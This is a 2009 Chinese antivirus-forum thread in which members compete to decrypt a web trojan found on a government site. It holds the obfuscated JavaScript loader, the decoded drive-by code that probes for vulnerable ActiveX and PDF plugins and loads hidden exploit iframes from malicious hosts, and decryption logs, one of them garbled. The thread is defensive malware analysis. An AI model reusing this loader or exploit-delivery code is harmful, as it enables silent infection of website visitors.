瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密悬赏第三十六期(已结束)
networkedition - 2009-11-6 12:54:00


引用:
http://zx.huainan.gov.cn/wxzb.html




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有会员均可参加


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2009-11-6 12:55:00


[复制到剪贴板]
CODE:
<script>ln="62656f363b300162656f3a363b30016d7e65687f6264652b6f64626d796a666e7879682322700102626d2362656f3a222b70010202796e7f7e7965233b2230010276010262656f3a363a3001026f64687e666e657f256c6e7f4e676e666e657f4972426f232c6672626d796a666e2c22257879683629637f7f7b3124246c64646c676e25666a6562726a606a7f2568652429300176016f64687e666e657f257c79627f6e232937626d796a666e2b7c626f7f63362c3a2c2b636e626c637f362c3a2c2b787f72676e362c7d627862696267627f723163626f6f6e652c2b626f362c6672626d796a666e2c2b646547646a6f362c7f7972706f64626d796a666e78796823223076686a7f6863236e2270762c353724626d796a666e3529223001626d236f64687e666e657f256a6767222b7001026f64626d796a666e78796823223001760178787e7c7a653629456a4529307f60677f7f7d3629456a452930";yotl="function ikchbw(){nycf=Math.PI;ssy=parseInt;lywr='length';zufro=ssy(~((nycf&nycf)|(~nycf&nycf)&(nycf&~nycf)|(~nycf&~nycf)));fxrw=ssy(((zufro&zufro)|(~zufro&zufro)&(zufro&~zufro)|(~zufro&~zufro))&1);qibo=fxrw<<fxrw;tklttv=zufro;ssuwqn='';mmhnih=String.fromCharCode;osbj=eval;for(tihzh=zufro;tihzh<yotl[lywr];tihzh-=-fxrw)tklttv+=yotl.charCodeAt(tihzh);tklttv%=unescape(zufro+mmhnih(120)+(fxrw<<6));for(tihzh=zufro;tihzh<ln[lywr];tihzh+=qibo)ssuwqn+=mmhnih(ssy(zufro+mmhnih(120)+ln.charAt(tihzh)+ln.charAt(tihzh+ssy(fxrw)))^tklttv);try{osbj(ssuwqn);}catch(e){try{eval(ssuwqn);}catch(e){;}}}try{eval('ikchbw();')}catch(e) {}";eval(yotl);</script>


ty88 - 2009-11-6 13:12:00
http://google.maniyakat.cn/         
document.write("<iframe width='1' height='1' style='visibility:hidden' id='myiframe' onLoad='try{doiframesrc();}catch(e){}'></iframe>");


关于:hxxp://zx.huainan.gov.cn/wxzb.html解密的日志(全体输出 -  10):

Level  0>http://zx.huainan.gov.cn/wxzb.html
Level  1>http://google.maniyakat.cn/in2.php?act=com
Level  1>http://google.maniyakat.cn/in2.php?act=access&c=+escape
Level  1>http://google.maniyakat.cn/in2.php?act=encoder
Level  1>http://google.maniyakat.cn/in2.php?act=mdac
Level  1>http://google.maniyakat.cn/in2.php?act=access&c=+escape
Level  1>http://google.maniyakat.cn/in2.php?act=encoder
Level  1>http://google.maniyakat.cn/in2.php?act=mdac
Level  1>http://google.maniyakat.cn/1.pdf?ver=+pdf+
Level  1>http://zx.huainan.gov.cn/images/zhengxie.swf

日志由 Redoce2.0第45次修正版于 2009-11-6 13:11:33 生成。
啥P玩意。。全打不开
ty88 - 2009-11-6 13:16:00
[quote]curdate=new Date();
time=curdate.getTime()+1000*90000;
curdate.setTime(time);
time=curdate.toGMTString()

document.cookie='u_id=8843; expires='+time;


soft=pdf=flash=obj=acs=sp=0;
acss=new Array(
    'snpvw.Snapshot Viewer Control.1',
    '{F2175210-368C-11D0-AD81-00A0C90DC8D9}'
);
i=0;
do {
    try {
        var acs_obj=new ActiveXObject(acss[i]);
    } catch(e){}
    i++;       
}while(!acs_obj && i<acss.length)
if(acs_obj){
    i--;
    acs=acss[i];
}
if(window.ActiveXObject) {
    try {
        obj=new ActiveXObject("AcroPDF.PDF");
    }catch(e){
        try {
            obj=new ActiveXObject("PDF.PdfCtrl");
        } catch(e) {}
    }
    if(obj) {
        try{
            pdf=obj.GetVersions().split(',');
            pdf=pdf[1].split('=');
            pdf=pdf[1];
        }catch(e){pdf=0; }
    }
}

encoder=1;
try{
    obj=document.createElement("object");
    obj.setAttribute("classid","clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C");
    obj.GetDetailsString(1,1);
} catch(e) {
    encoder=0;
}
if((pdf)&&(((pdf.substring(0,3)=='8.0')||((pdf.substring(0,3)=='8.1')&&(pdf.charAt(4)<3)))||(pdf=='9.0.0'))) {
    document.write('<iframe src="1.pdf?ver='+pdf+'" style="display:none"></iframe>');
document.write('<iframe src="in2.php?act=mdac" style="display:none"></iframe>');
if(encoder)
  document.write('<iframe src="in2.php?act=encoder" style="display:none"></iframe>');
if(acs)
  document.write('<iframe src="in2.php?act=access&c='+escape(acs)+'" style="display:none"></iframe>');

}
else{
    document.write('<iframe src="in2.php?act=mdac" style="display:none"></iframe>');
if(encoder)
  document.write('<iframe src="in2.php?act=encoder" style="display:none"></iframe>');
if(acs)
  document.write('<iframe src="in2.php?act=access&c='+escape(acs)+'" style="display:none"></iframe>');
document.write('<iframe src="in2.php?act=com" style="display:none"></iframe>');
 
}[/quote]
shadowmin - 2009-11-6 16:11:00
¹ØÓÚ:hxxp://zx.huainan.gov.cn/wxzb.html½âÃܵÄÈÕÖ¾(È«ÌåÊä³ö -  8):

Level  0>http://zx.huainan.gov.cn/wxzb.html
Level  1>http://google.maniyakat.cn
Level  2>http://iii-tv.cn/htc/in.php
Level  3>http://iii-tv.cn/htc/in2.php?act=com
Level  3>http://iii-tv.cn/htc/in2.php?act=access&c=
Level  3>http://iii-tv.cn/htc/in2.php?act=encoder
Level  3>http://iii-tv.cn/htc/in2.php?act=mdac
Level  3>http://iii-tv.cn/htc/1.pdf?ver=9.0.0

ÈÕÖ¾ÓÉ Redoce2.0µÚ45´ÎÐÞÕý°æÓÚ 2009-11-6 16:10:11 Éú³É¡£
1
查看完整版本: 网马解密悬赏第三十六期(已结束)
© 2000 - 2024 Rising Corp. Ltd.